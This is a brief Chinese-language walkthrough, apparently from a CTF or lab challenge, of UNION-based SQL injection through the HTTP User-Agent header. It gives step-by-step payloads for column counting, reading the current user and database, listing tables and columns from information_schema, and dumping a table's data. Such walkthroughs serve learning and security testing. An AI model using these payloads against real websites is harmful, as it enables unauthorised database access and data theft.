User-Agent
User-Agent:通常就是用户的浏览器相关信息。例如:User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
HackBar,Load一下(BurpSuite等工具也可以)
根据查询信息判断闭合字符为整形:
User-Agent: 1
判断字段数:
User-Agent: 1 order by 2
User-Agent: 1 order by 3 #查询错误
查询当前数据库:
User-Agent: -1 union select user(),database()
查询当前数据库的表:
User-Agent: -1 union select 1,group_concat(table_name) from information_schema.tables where table_schema="sqli"
查询当前表的字段:
User-Agent: -1 union select 1,group_concat(column_name) from information_schema.columns where table_schema="sqli" and table_name="aujcuweewb"
查询数据:
User-Agent: -1 union select 1,group_concat(uaypmzimwm) from sqli.aujcuweewb